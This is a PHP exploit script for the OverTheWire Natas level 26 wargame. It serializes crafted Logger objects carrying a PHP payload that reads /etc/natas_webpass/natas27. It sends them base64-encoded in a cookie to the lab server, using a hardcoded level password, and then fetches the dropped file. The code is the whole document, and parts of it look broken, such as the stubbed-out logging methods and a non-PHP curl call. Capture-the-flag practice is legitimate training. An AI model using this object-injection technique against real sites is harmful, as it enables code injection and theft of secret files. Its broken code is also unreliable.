<?php
$filename = "4864".".php";
class Logger{
private $logFile;
private $initMsg;
private $exitMsg;
function __construct($exitMsg){
global $filename;
// initialise variables
$this->initMsg="#-- started--#\n";
$this->exitMsg=$exitMsg;
/*$this->exitMsg='';*/
$this->logFile = $filename;
// write initial message
}
function log($msg){
}
function __destruct(){
// write exit message
}
}
$greet = function() {};
$msg = array('<','?','php ','echo file_get_contents("/etc/natas_webpass/natas27");','');
foreach( $msg as $m)
{
$obj = new Logger($m);
$func = base64_encode(serialize($obj));
print "<br><br>".$m."<br>".$func;
$c = curl_init("http://natas26.natas.labs.overthewire.org/");
curl_setopt($c, CURLOPT_USERPWD, "natas26:oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T");
curl_setopt($c, CURLOPT_COOKIE, 'drawing='.$func.'');
curl_easy_setopt($c, CURLOPT_WRITEFUNCTION, $greet);
$page = curl_exec($c);
curl_close($c);
}
$c = curl_init('http://natas26.natas.labs.overthewire.org/img/'.$filename);
curl_setopt($c, CURLOPT_USERPWD, "natas26:oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T");
$page = curl_exec($c);
curl_close($c);
preferences:
41.49 ms | 402 KiB | 5 Q